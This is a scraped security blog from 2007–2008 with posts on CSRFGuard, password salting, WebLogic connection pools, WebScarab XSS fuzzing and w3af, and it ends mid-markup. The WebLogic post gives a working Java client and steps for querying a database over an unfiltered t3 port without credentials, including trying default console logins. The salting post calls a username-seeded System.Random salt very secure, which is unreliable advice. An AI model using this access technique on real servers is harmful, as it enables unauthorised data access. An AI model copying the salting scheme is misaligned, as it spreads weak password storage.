color="#800000"></body> <br /></html></font> <br /></p> <p><strong>Protected Servlet:</strong> <p>Below is my <em>csrfServlet.java.</em> There is really nothing in this code except a message stating that you made it this far. <br /></p> </p> <p><font color="#800000">import java.io.IOException; <br />import java.io.PrintWriter; <br />import javax.servlet.*; <br />import javax.servlet.http.*; <br />import javax.servlet.jsp.*; <br />import org.apache.jasper.runtime.*;</font> </p> <p><font color="#800000">public class csrfServlet extends HttpServlet { <br />    /** <br />     * <br />     */ <br />    private static final long serialVersionUID = -6429166168752177032L;</font> </p> <p><font color="#800000">    public void doGet(HttpServletRequest request, HttpServletResponse response) throws IOException, ServletException <br /></font>    { </p> <p><font color="#800000">        response.setContentType("text/html"); <br />        PrintWriter out = response.getWriter(); <br />        out.println("<html>"); <br />        out.println("<body>"); <br />        out.println("You Made it"); <br />        out.println("</body>"); <br />        out.println("</html>"); <br />    } <br />}</font> </p> <p></p> <p>Now I have it a working CSRF filter. For this to work all my links need to be dynamically generated to include OWASP_CSRFTOKEN=blah as in my login page or Posted through hidden fields in a form. </p> <p>My questions now are: <br />How well will this work in a clustered environment? <br />How to ensure that the application has been carefully coded not to give up the CSRFToken by accident. I'm working on a proof of concept for this one. </p> <p> <p></p> <p>Let me know if there is anyone else out there using CSRFGuard and your experiences with it. </p></p> Unknownnoreply@blogger.com4tag:blogger.com,1999:blog-2410549130005981530.post-54786604543067071212008-05-07T15:20:00.006-05:002008-12-17T01:10:02.411-06:00Secure salt, for tasty hashesThere is a right way and a less secure way to salt. I have heard all kinds of reasons to salt but let’s remember that this only stops someone from using a dictionary attack against your hashes. I have heard some blog posts say that this prevents rainbow table attacks which I believe is inaccurate. Consider the following. I have a salt ‘12345678901234567890’. Now I will combine passwords like this 12345678901234567890 + <span style="font-style: italic;">password</span>. Now I will sha256 it and get<span style="font-weight: bold;"> JLKyuoTkWpu1nKzx24By0G45ACAQg9XvJIAbYXT0mo8=</span> . I do the same thing with the password being <span style="font-style: italic;">password2 </span>which equals <span style="font-weight: bold;">vwXZcCYEybvlfdm1xwOXnrXo0sWX+f634njY3SMVyaI=</span> .<br /><br />For a rainbow table to work I need generate a large set of data, hash that data, then compare hashes with the compromised data. If the hashes match I return the value of the generated data.<br />Now at this point ignore the computational time and storage. If I do a brute force and compute hashes for the rainbow and notice the following:<br /><br /><span style="font-weight: bold;">JLKyuoTkWpu1nKzx24By0G45ACAQg9XvJIAbYXT0mo8=</span><span style="font-weight: bold;"> </span><span style="font-style: italic;">returns </span>12345678901234567890password<br /><br />and<br /><br /><span style="font-weight: bold;">vwXZcCYEybvlfdm1xwOXnrXo0sWX+f634njY3SMVyaI=</span> <span style="font-style: italic;">returns </span>12345678901234567890password2<br /><br />If I could find just two or three numbers with the same salt then i would not have to calculate the entire space N character space. I can deduce that the salt is <span style="font-style: italic;">12345678901234567890 </span>since each number begins with it. Now that I know the salt i can begin doing dictionary attacks with the salt + 'dictionary word' or compute every possible combination of salt + alphanumeric characters.<br /><br />One other thing I would like to point out is that if i could pre-calculate the entire space(salt + password) then I can identify collisions this way as well. If I notice a lot of numbers that begin with <span style="font-style: italic;">12345678901234567890 </span>and just a few that do not then the few that do not I can ignore as erroneous or try to find a match to a value later in the rainbow table.<br /><br />Now I will point out possible hashing scenarios and what it would take to brute force them.<br /><br /><br /><br /><b>Scenario 1: Known salt, known passwords requirements.</b><br />Lets say I have compromised a database of sha1 password hashes with a password length that must be exactly 8 char alphanumeric. I know the salt so now I only need to calculate<br />64^8. I need to calculate 281474976710656 hashes. On my machine it takes 2.57952379422524 seconds to calculate 1,000,000 sha1 hashes. So I can calculate the entire space in .. 17.5713 years! Sounds like a lot but if I can recruit a bot net or distributed computing then I can take 100 machines to calculate the space in about 63 days.<br /><br /><br /><b>Scenario 2: Different salt for every hash, known salt, and known password requirements. A much better way!</b><br /><br />Now to figure out one password hash I need to compute the entire space with the unique salt to get one password. I assume here that the salt is public like the username or database creation date. Some value that is readily available from the compromised database So using the same logic as before but I will need 63 days for <span style="font-weight: bold;">EACH </span>password using a distributed computing system. This is much more time consuming to compute and therefore more secure.<br /><br /><br /><br /><b>Scenario 3: Unique salt that is long and algorithmically calculated for every hash.</b><br /><br />Below is an example code of what I believe is a very secure hashing implementation based on Scenario 2 but with the salt algorithmically generated. It is written in c#. I use the username to generate a value that acts as a seed to a random number generator. I concatenate multiple generated random numbers to create my salt. Then prepend to the salt to the password before hashing. For a rainbow table to be computed and the algorithm to compute the salt is unknown the user would have to calculate roughly 64^45 possible combinations or more. Of course if the algorithm is known then the scenario is identical to Scenario 2. This code allows you to create very long yet unique salts for every password hash.<br /><pre><br />using System;<br />using System.Collections.Generic;<br />using System.Linq;<br />using System.Text;<br />using System.Security.Cryptography;<br />using System.Diagnostics;<br /><br />namespace crypto<br />{<br />class Program<br />{<br /> static void Main(string[] args)<br /> {<br /> string username = "ascetik";<br /> string clearText = "password";<br /> byte[] userBytes;<br /> string salt;<br /> byte[] saltandclear;<br /> byte[] cipherText;<br /> string hashedString = "";<br /><br /><br /> //Generate the salt. This could be any algorithm you choose. I took<br /> // the username, converted to a byte array, then XORed the bytes together.<br /> // I took the xored result as the seed to my random number generator.<br /> // Then i used the result of the PRG as my salt.<br /> userBytes = ASCIIEncoding.ASCII.GetBytes(username);<br /> long XORED = 0x00;<br /> foreach (int x in userBytes)<br /> XORED = XORED ^ x;<br /> <br /> Random rand = new Random(Convert.ToInt32(XORED));<br /> salt = rand.Next().ToString();<br /> salt += rand.Next().ToString();<br /> salt += rand.Next().ToString();<br /> salt += rand.Next().ToString();<br /> <br /> //prepend the salt to the clear text and convert to byte array<br /> saltandclear = ASCIIEncoding.ASCII.GetBytes(salt + clearText);<br /> Console.Out.WriteLine(“salt + password length:” + saltandclear.Length);<br /> //compute sha256 hash<br /> SHA256 sha256 = new SHA256Managed();<br /> cipherText = sha256.ComputeHash(saltandclear);<br /><br /><br /> Console.Out.WriteLine(Convert.ToBase64String(cipherText));<br /> Console.In.ReadLine();<br /><br /><br /> }<br />}<br />}<br /><br /></pre><br /><br /><br /><br /><b>Conclusion</b><br />Using a unique salt, that is algorithmically created, for each hash could drastically improve the confidentiality of a system. I better way would be to run a mixing algorithm like a hash over the data and using the result as the password to hash or hashing twice. With this option even if all the hashes where matched to entries in the rainbow table the data would still be useless. But the con to this is that it could increase the chance for data collisions and is <span style="font-weight: bold;">not </span>recommended. I’ll leave this up to the crypto experts to figure out. It seems that for now that Scenario 2 and 3 are efficient mitigation against rainbow table and dictionary attacks attacks.<br /><br /><br /><br /><br /><br /><br /><b>Explanation of numbers:</b><br />Alpha chars = 26<br />Upper and lower case chars = 2*26= 52<br />Numbers = 10<br />All Possible Alphanumeric with 8 chars = (52 +10)^8<br />All Possible characters that are exactly 8 characters in length = 62^8<br /><br /><br /><br /><br /><table><tbody><tr><td><br /><script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script><br /></td><td><br /><a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)"> <img src="http://images.slashdot.org/favicon.gif" alt="Slashdot" border="0" width="16" height="16" /></a> <a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)">Slashdot It!</a> <!-- End Slashdot It link --><br /></td></tr><br /></tbody></table>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2410549130005981530.post-36540440576891975482008-03-03T16:47:00.003-06:002008-10-23T23:13:26.115-05:00Fun With WebLogic Connection Pools- Free database connectionsI have found a huge mis-configuration in the several of the WebLogic Servers that I audit. Most applications that are running on WebLogic use something called <a href="http://edocs.bea.com/wls/docs81/jdbc/programming.html"><b>Database Connection Pools</b></a>. These are database connections that the WebLogic server makes and the applications configured within WebLogic can use. You configure all these database credentials inside the WebLogic console so that the application doe not need to have access to these credentials to run queries, update, delete, etc. This can be great from a security policy standpoint in that you don't have to have developers being knowledgeable of the production database credentials for the app to function. This is also the root of the problem if the WebLogic server has not enabled <a href="http://edocs.bea.com/wls/docs81/secmanage/domain.html"><b>connection filters</b></a>.<br /><br /><br />WebLogic has a proprietary protocol called <a href="http://edocs.bea.com/wls/docs91/ConsoleHelp/taskhelp/channels/ConfigureT3Protocol.html"><b>t3</b>. </a> This protocol will allow an improperly configured WebLogic instance accept connections from anywhere and any server. This means you can access the database through WebLogic without providing any database credentials. There are only 3 pieces of information that you need to know.<br /><br /><br /><ol><li>the server name (easy to get).</li><li>the port that WebLogic is listening on to accept t3 connections. Sometimes 7001 sometimes something else. I usually do an nmap scan of the server and then try connections over t3 until I get a proper connection or an error that implies i have made the connection but my datasource is incorrect.</li><li>Know the datasouce name. This can be hard. Most apps name the datasource something like AppNameData source. If you where looking at a Creditcard application. It could be ccDataSource or CreditCardDatasource or just Creditcard. This can take some trial an error unless =) they have not changed the weblogic console default username and password weblogic/weblogic. The url to the weblogic console is http://yourappserver:7001/console. If this does not yield results then do an nmap scan and try connecting to ports till you get the admin console. </li></ol><br />Below is an example of creating a t3 client to connect to WebLogic and then query the systables in a DB2 database. You can modify the code to work with any database you need. As you can see i never provide credentials and i still have access to the database.<br /><br /><br /><br /><br /><pre style="color: rgb(255, 0, 0);"><br /><br />import java.util.*;<br />import java.math.BigDecimal;<br />import java.sql.*;<br />import javax.naming.*;<br />import java.sql.Connection;<br /><br />public class DataTest<br />{<br /> public static void main(String[] args)<br /> {<br /> InitialContext ctx = null;<br /> Connection connection = null;<br /> Statement stmt = null;<br /> ResultSet rs = null;<br /> Hashtable ht = null;<br /> String status = null;<br /> String resCode = null;<br /> String retCode = null;<br /> String retMsg = null;<br /> BigDecimal sqlCode = null;<br /> String serverName = "yourservername.com:andPort";<br /> String dataSource = "YourDataSource";<br /><br /> try<br /> {<br /> ht = new Hashtable();<br /> ht.put(Context.INITIAL_CONTEXT_FACTORY, "weblogic.jndi.WLInitialContextFactory");<br /> ht.put(Context.PROVIDER_URL, "t3://" + serverName);<br /> ctx = new InitialContext(ht);<br /> connection = ((javax.sql.DataSource)ctx.lookup( dataSource )).getConnection();<br /> <br /> // check for excessive permissions in db2<br /> String sql = "select name, creator, colcount from sysibm.systables";<br /><br /> //find the username you are conneting with in weblogic<br /> //String sql = "select user,1,1 from sysibm.sysdummy1";<br /><br /> // normal check but you must know the db owner and table name for db2<br /> //String sql = "select col1, col2, col3 from dbowner.dbtableName";<br /><br /><br /><br /><br /> stmt = connection.createStatement();<br /> rs = stmt.executeQuery(sql);<br /> while(rs.next())<br /> System.out.println(rs.getString(1) + " - " + rs.getString(2) + " - " + rs.getString(3));<br /><br /><br /><br /> }<br /> catch(Exception e)<br /> {<br /> e.printStackTrace();<br /> }<br /> finally<br /> {<br /> try<br /> { <br /> if(stmt!=null)<br /> stmt.close();<br /> stmt = null;<br /> <br /> if(connection!=null)<br /> connection.close();<br /> connection = null;<br /><br /> if(ctx!=null)<br /> ctx.close();<br /> ctx = null;<br /> }<br /> catch(Exception e)<br /> {<br /> e.printStackTrace();<br /> }<br /> }<br /> }<br />}<br /><br /></pre>Example of pulling database tables from Eclipse:<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_acrzuhZS74A/R8yBQfdyxTI/AAAAAAAAA0o/G6PMnJ4W-LI/s1600-h/weblogicHack.bmp"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_acrzuhZS74A/R8yBQfdyxTI/AAAAAAAAA0o/G6PMnJ4W-LI/s320/weblogicHack.bmp" alt="" id="BLOGGER_PHOTO_ID_5173652192266208562" border="0" /></a><br /><br />here is an example of a good error message from your client. This will let you know that you have been successful in finding a weblogic connection pool but do not have a valid datasource name. Here the invalid datasource name was called testSource.<br /><br /><pre><br /><br /><span style="color: rgb(255, 0, 0);">javax.naming.NameNotFoundException: Unable to resolve 'testSource'. Resolved '' [Root exception is javax.naming.NameNotFoundException: Unable to resolve 'testSource'. Resolved '']; remaining name 'testSource'</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rjvm.BasicOutboundRequest.sendReceive(BasicOutboundRequest.java:108)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.cluster.ReplicaAwareRemoteRef.invoke(ReplicaAwareRemoteRef.java:290)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.cluster.ReplicaAwareRemoteRef.invoke(ReplicaAwareRemoteRef.java:247)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.ServerNamingNode_814_WLStub.lookup(Unknown Source)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.WLContextImpl.lookup(WLContextImpl.java:371)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.WLContextImpl.lookup(WLContextImpl.java:359)</span><br /><span style="color: rgb(255, 0, 0);"> at javax.naming.InitialContext.lookup(Unknown Source)</span><br /><span style="color: rgb(255, 0, 0);"> at DataTest.main(DataTest.java:35)</span><br /><span style="color: rgb(255, 0, 0);">Caused by: javax.naming.NameNotFoundException: Unable to resolve 'testSource'. Resolved ''</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.BasicNamingNode.newNameNotFoundException(BasicNamingNode.java:1139)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.BasicNamingNode.lookupHere(BasicNamingNode.java:252)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.ServerNamingNode.lookupHere(ServerNamingNode.java:171)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.BasicNamingNode.lookup(BasicNamingNode.java:206)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.jndi.internal.RootNamingNode_WLSkel.invoke(Unknown Source)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.internal.BasicServerRef.invoke(BasicServerRef.java:548)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.cluster.ClusterableServerRef.invoke(ClusterableServerRef.java:224)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.internal.BasicServerRef$1.run(BasicServerRef.java:438)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.security.acl.internal.AuthenticatedSubject.doAs(AuthenticatedSubject.java:363)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.security.service.SecurityManager.runAs(SecurityManager.java:147)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.internal.BasicServerRef.handleRequest(BasicServerRef.java:434)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.internal.BasicServerRef.access$300(BasicServerRef.java:57)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.rmi.internal.BasicServerRef$BasicExecuteRequest.run(BasicServerRef.java:965)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.work.ExecuteThread.execute(ExecuteThread.java:209)</span><br /><span style="color: rgb(255, 0, 0);"> at weblogic.work.ExecuteThread.run(ExecuteThread.java:181)</span><br /></pre><br /><br /><br />This problem is easy to fix. Just enable connection filers in your weblogic console and your done!.<br />http://edocs.bea.com/wls/docs81/secmanage/domain.html<br /><br /><br /> <br /><br /><br /><br /><br /><br /><table><tbody><tr><td><br /><script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script><br /></td><td><br /><a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)"> <img src="http://images.slashdot.org/favicon.gif" alt="Slashdot" border="0" height="16" width="16" /></a> <a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)">Slashdot It!</a> <!-- End Slashdot It link --><br /></td></tr><br /></tbody></table>Unknownnoreply@blogger.com8tag:blogger.com,1999:blog-2410549130005981530.post-7646024848393750132007-12-09T21:36:00.000-06:002008-10-23T23:13:38.956-05:00Visio's Built in Web SpiderThere is this really great feature in visio 2003 that is excellent for website spidering and mapping. I rarely find a need for a microsoft product but this one is actually very useful. If you have installed the web diagram options for visio then you can start a web site map. As soon as you select this link you are prompted for a URL. After entering the URL visio will spider the entire site and create a nice mapping of most areas of the site. It even shows you broken links. The only problem is that currently i dont see a way to log in to protected sites automatically but you can click on a node from the generated Visio and start interactive mode. This will start a browser in visio that will allow you to log in and navigate the site as well as record your movements on the visio diagram.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_acrzuhZS74A/R1y-COZ1ZPI/AAAAAAAAAy4/HM3kzn5etH4/s1600-h/visio1.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp3.blogger.com/_acrzuhZS74A/R1y-COZ1ZPI/AAAAAAAAAy4/HM3kzn5etH4/s320/visio1.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5142193819985732850" /></a><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_acrzuhZS74A/R1y6r-Z1ZOI/AAAAAAAAAyw/p0F3ssiUsM4/s1600-h/Drawing1.jpg"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="http://bp2.blogger.com/_acrzuhZS74A/R1y6r-Z1ZOI/AAAAAAAAAyw/p0F3ssiUsM4/s320/Drawing1.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5142190139198760162" /></a><br /><br /><br />This could be very useful for both blackbox and white box testing. It may even uncover parts of the site you missed during your initial investigation of your audit target. I just started looking into it so i don't know how much it will assist me but <br /><br /><br /><table><tr><td><br /><script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script><br /></td><td><br /><a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)"> <img src="http://images.slashdot.org/favicon.gif" alt="Slashdot" border="0" height="16" width="16" /></a> <a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)">Slashdot It!</a> <!-- End Slashdot It link --><br /></td></tr><br /></table>Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2410549130005981530.post-1217114093862576702007-12-08T23:13:00.001-06:002008-10-23T23:13:52.864-05:00WebScarab Scripting and Fuzzing.I have been really busy and have therefore not posted in a while. Work has really consumed me and I was studying to take the CEH (Certified Ethical Hacker) on Dec. 1st. Which a am very proud to say that I am now a Certified Ethical Hacker! Well, I have spent a lot of time working on fuzzers and ways to make my penetration testing more efficient. I have recently discovered the scripting options in webscarab (written by Rogan Dawes) and been trying to make some use of this feature. What I wrote was simple script that once an XSS exploit has been found it will write a screen scrape of that page to the file system. This way you can quickly identify which attacks worked and which ones did not using the Fuzzer plugin within WebScarab. Here is the script:<br /><br /><pre style="color: rgb(0, 0, 153);"><br />import org.owasp.webscarab.model.ConversationID;<br /><br />import org.owasp.webscarab.model.HttpUrl;<br /><br />import org.owasp.webscarab.model.Request;<br /><br />import org.owasp.webscarab.model.Response;<br /><br />import java.text.DateFormat;<br /><br />import java.text.SimpleDateFormat;<br /><br />import java.io.BufferedReader;<br /><br />import java.io.BufferedWriter;<br /><br />import java.io.FileReader;<br /><br />import java.io.FileWriter;<br /><br />import javax.swing.JOptionPane;<br /><br /><br /><br /><br /><br />String xssFile = "/home/ascetik/xss.txt";<br />// Load xss strings<br />DateFormat df = new SimpleDateFormat( "yyyyMMdd-hhmmss" );<br /><br />String date = df.format(new java.util.Date());<br /><br />String outFile = "/home/ascetik/screenScrapes/ss-" + date + ".html";<br />// save file based on date<br />BufferedReader xssStrings = new BufferedReader(new FileReader(xssFile));<br /><br />BufferedWriter bfOut = new BufferedWriter(new FileWriter(outFile));<br /><br />Response response = conversation.getResponse();<br />// conversation Response<br />Request request = conversation.getRequest();<br />// conversation Request<br />byte[] hexResp = response.getContent();<br />// get the screen scrape<br />String raw = new String(hexResp);<br />// convert it to string<br /><br />// Test the Response to see if our string is echoed back<br />String xss;<br /><br />while ((xss = xssStrings.readLine()) != null) {<br /><br />if ( raw.indexOf(xss) != -1 && xss != "") {<br /><br />bfOut.write(raw);<br /><br />bfOut.close();<br /><br />//JOptionPane.showMessageDialog(null, "Possible XSS Found");<br /><br />}<br /><br /><br /><br />}<br /><br /></pre><br /><br />Now let me explain. This script is run after the response is received from the server. I have a file called xss.txt that contains xss exploits that I also use as the input source for the Fuzzer plugin (i'll explain more later) but I also use it in this script to search for the strings in the server response. If the string is found in the response there is a fairly good chance the exploit was successful.<br />When one of the xss string is found I write an html file that is a screen scape of the response and the file name looks like “ss-20071201-041504.html”. Which is ss + the date and time down to the second.<br /><br />To use this script you need to load it to the webscarab framework via Tools->Script Manager at the top of the WebScarab application.<br />Then there is a tree view that displays Framework->AddConversation.<br />Click Add at the top.<br />Now every time a conversation is added to the Summary of WebScarab this script will run as long as the checkbox is selected next to the script in the Script Manager.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp0.blogger.com/_acrzuhZS74A/R1t6zuZ1ZKI/AAAAAAAAAyQ/zsjC_zLK6ug/s1600-h/Scripted+Events.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp0.blogger.com/_acrzuhZS74A/R1t6zuZ1ZKI/AAAAAAAAAyQ/zsjC_zLK6ug/s320/Scripted+Events.png" alt="" id="BLOGGER_PHOTO_ID_5141838428621857954" border="0" /></a><br /><br /><b>Using the Fuzzer</b><br />Once you have the above script loaded in the Script Manager go to the Summary tab and find a conversation that you want to fuzz. You can look at the parameters column to find a fuzzable request. Now right click and select Use as fuzz template. Select the Fuzzer tab now and you will see your request added here with all the parameters broken out.<br />Click Source in the middle of the Fuzzer plugin and add the same xss.txt file that you have listed in the above script. Once this is done you can use this file to fuzz the parameters in the fuzz template.<br />Select the fuxx source for each parameter from a drop down box.<br /><br />Now click start. If any of your fuzzing executed an XSS you will see files appearing in your folder you assigned in the Script Manager.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_acrzuhZS74A/R1t-b-Z1ZMI/AAAAAAAAAyg/f3xD3ma2NFU/s1600-h/Fuzzer.png"><img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer;" src="http://bp1.blogger.com/_acrzuhZS74A/R1t-b-Z1ZMI/AAAAAAAAAyg/f3xD3ma2NFU/s320/Fuzzer.png" alt="" id="BLOGGER_PHOTO_ID_5141842418646475970" border="0" /></a><br /><br />As you can see this can be used for several different things. You could have sql injection strings listed in the fuzzer sources and then have partial sql error messages be in the file you use as input to the script you added to the Script Manager. Once you know your way around WebScarab and which hooks are available you are only limited by your imagination.<br /><br /><br /><b>More on Webscarab and Scripting.</b><br />In the script manager you will see descriptions of the hooks available to you. I just explained the conversation options but there are Proxy options as well. You can have special scripts run on both the request and response for the proxy. I used the conversation because I could not query the responses from the fuzzer plugin via the proxy scripts. Some ideas I have thought about implementing are alerts that pop up when patterns in the responses like hidden error messages, ip address strings, etc. are found.<br /><br /><br /><br /><br /><br /><br /><table><tbody><tr><td><br /><script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script><br /></td><td><br /><a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)"> <img src="http://images.slashdot.org/favicon.gif" alt="Slashdot" border="0" height="16" width="16" /></a> <a href="javascript:location.href='http://slashdot.org/bookmark.pl?url='+encodeURIComponent(location.href)+'&title='+encodeURIComponent(document.title)">Slashdot It!</a> <!-- End Slashdot It link --><br /></td></tr><br /></tbody></table>Unknownnoreply@blogger.com3tag:blogger.com,1999:blog-2410549130005981530.post-26987476553891992562007-10-19T16:25:00.000-05:002008-10-23T23:14:17.549-05:00W3AF Tutorial (Part 2)<span style="font-weight: bold;font-size:130%;" >Overview</span><br />From the previous article we started a basic audit with <a href="http://w3af.sourceforge.net/">w3af</a>. This article we are going to discuss writing scripts to start an audit and then we will discuss some of the cool tools included in w3af. The next article will hopefully be about writing plugins. So stay tuned for that. There has been a new versions released on Oct 18th. This article deals with the previous version but none of the topics I have discussed have changed.<br /><span style="font-size:130%;"><br /></span><span style="font-weight: bold;font-size:130%;" >Writing StartUp scripts</span><br />If you have an audit configuration that you use over an over then scripts are a necessity. It is pain to have to set the same options for your output, auditing and discovery features if you use the same things all the time and only change the target. We will start with a script that you can configure to meet your needs.<br /><br />Create a file named anything. I will call mine basic.w3af. you write the script the same way that you would actually navigate through w3af to set the settings. So the script below will set all out audit, discovery, and output plugins so that these do not need to be set up after we start w3af.<br /><br /><span style="color: rgb(153, 0, 0);"># Basic startup script</span><br /><span style="color: rgb(153, 0, 0);">plugins</span><br /><span style="color: rgb(153, 0, 0);">output console,htmlFile</span><br /><span style="color: rgb(153, 0, 0);">output</span><br /><span style="color: rgb(153, 0, 0);">output config htmlFile</span><br /><span style="color: rgb(153, 0, 0);">set verbosity 10</span><br /><span style="color: rgb(153, 0, 0);">back</span><br /><span style="color: rgb(153, 0, 0);">output config console</span><br /><span style="color: rgb(153, 0, 0);">set verbosity 5</span><br /><span style="color: rgb(153, 0, 0);">back<br /><br /></span><span style="color: rgb(153, 0, 0);"># could change this to audit all but just doing Cross Site Scripting Now</span><br /><span style="color: rgb(153, 0, 0);">audit xss </span><br /><span style="color: rgb(153, 0, 0);">audit</span><br /><br /><span style="color: rgb(153, 0, 0);">discovery webSpider,pykto,hmap,allowedMethods</span><br /><span style="color: rgb(153, 0, 0);">discovery</span><br /><span style="color: rgb(153, 0, 0);">back</span><br /><br /><span style="color: rgb(153, 0, 0);">target </span><br /><span style="color: rgb(153, 0, 0);">set target http://localhost:8081</span><br /><span style="color: rgb(153, 0, 0);">back</span><br /><br /><br />You can also add start to the end of this file and it will automatically start profiling the target when run. To run just type:<br /><span style="font-weight: bold;">>./w3af –s basic.w3af</span><br /><br />Looks like this:<br /><pre><span style="color: rgb(153, 0, 0);">$ ./w3af -s basic.w3af</span><br /><span style="color: rgb(153, 0, 0);">w3af>>> plugins</span><br /><span style="color: rgb(153, 0, 0);">w3af/plugins>>> output console,htmlFile</span><br /><span style="color: rgb(153, 0, 0);">w3af/plugins>>> output</span><br /><span style="color: rgb(153, 0, 0);">Enabled output plugins:</span><br /><span style="color: rgb(153, 0, 0);">htmlFile</span><br /><span style="color: rgb(153, 0, 0);">console</span><br /><span style="color: rgb(153, 0, 0);">w3af/plugins>>> output config htmlFile</span><br /><span style="color: rgb(153, 0, 0);">w3af/plugin/htmlFile>>> set verbosity 10</span><br /><span style="color: rgb(153, 0, 0);">w3af/plugin/htmlFile>>> back</span><br /><span style="color: rgb(153, 0, 0);">w3af/plugins>>> output config console</span><br /><span style="color: rgb(153, 0, 0);">w3af/plugin/console>>> set verbosity 5</span><br /><span style="color: rgb(153, 0, 0);">w3af/plugin/console>>> back</span><br /><span style="color: rgb(153, 0, 0);">w3af/plugins>>> audit xss</span><br /><span style="color: rgb(153, 0, 0);">w3af/plugins>>> audit</span><br /><span style="color: rgb(153, 0, 0);">Enabled audit plugins:</span><br /><span style="color: rgb(153, 0, 0);">xss</span><br /><span style="color: rgb(153, 0, 0);">w3af/plugins>>> discovery webSpider,pykto,hmap,allowedMethods</span><br /><span style="color: rgb(153, 0, 0);">w3af/plugins>>> discovery</span><br /><span style="color: rgb(153, 0, 0);">Enabled discovery plugins:</span><br /><span style="color: rgb(153, 0, 0);">allowedMethods</span><br /><span style="color: rgb(153, 0, 0);">webSpider</span><br /><span style="color: rgb(153, 0, 0);">hmap</span><br /><span style="color: rgb(153, 0, 0);">pykto</span><br /><span style="color: rgb(153, 0, 0);">w3af/plugins>>> back</span><br /><span style="color: rgb(153, 0, 0);">w3af>>> target</span><br /><span style="color: rgb(153, 0, 0);">w3af/target>>> set target http://localhost:8081</span><br /><span style="color: rgb(153, 0, 0);">w3af/target>>> back</span><br /><span style="color: rgb(153, 0, 0);">w3af>>></span><span style="color: rgb(153, 0, 0);"></span><br /></pre><div style="text-align: left;"><br /></div><span style="font-size:130%;"><br /></span><br /><br />Now just type start and your audit will begin.<br /><br /><br /><span style="font-weight: bold;font-size:130%;" >Tools included in w3af</span><br />There are a few really cool tools in w3af. Move to the tools folder and list them.<br /><br /><pre><br /><span style="color: rgb(153, 0, 0);">w3af/tools>>> list</span><br /><span style="color: rgb(153, 0, 0);">base64decode</span><br /><span style="color: rgb(153, 0, 0);">base64encode</span><br /><span style="color: rgb(153, 0, 0);">gencc</span><br /><span style="color: rgb(153, 0, 0);">md5hash</span><br /><span style="color: rgb(153, 0, 0);">sha1hash</span><br /><span style="color: rgb(153, 0, 0);">urldecode</span><br /><span style="color: rgb(153, 0, 0);">urlencode</span><br /><span style="color: rgb(153, 0, 0);">w3af/tools>>></span><br /></pre><br /><br />With W3AF you can Generate Credit Card numbers and hashes. Open w3af and navigate to the tools folder. The gencc command can generate credit card numbers to test applications or what ever you want. It will generate the following card numbers<br />- mastercard<br />- visa16<br />- visa13<br />- amex<br />- discover<br />- diners<br />- enRoute<br />- jcb15<br />- jcb16<br />- voyager<br /><br />Run the following commands to create a 16 digit visa CC#.<br /><br /><pre><br /><span style="color: rgb(153, 0, 0);">w3af/tools>>> run gencc -t visa16</span><br /><span style="color: rgb(153, 0, 0);">Generated VISA 16 digit card:</span><br /><span style="color: rgb(153, 0, 0);">4916740510259019</span><br /><span style="color: rgb(153, 0, 0);">w3af/tools>>></span><br /></pre><br /><br />Create a sha1 hashes as follows:<br /><pre><br /><span style="color: rgb(153, 0, 0);">w3af/tools>>> run sha1hash -e 49167405102590194916740510259019</span><br /><span style="color: rgb(153, 0, 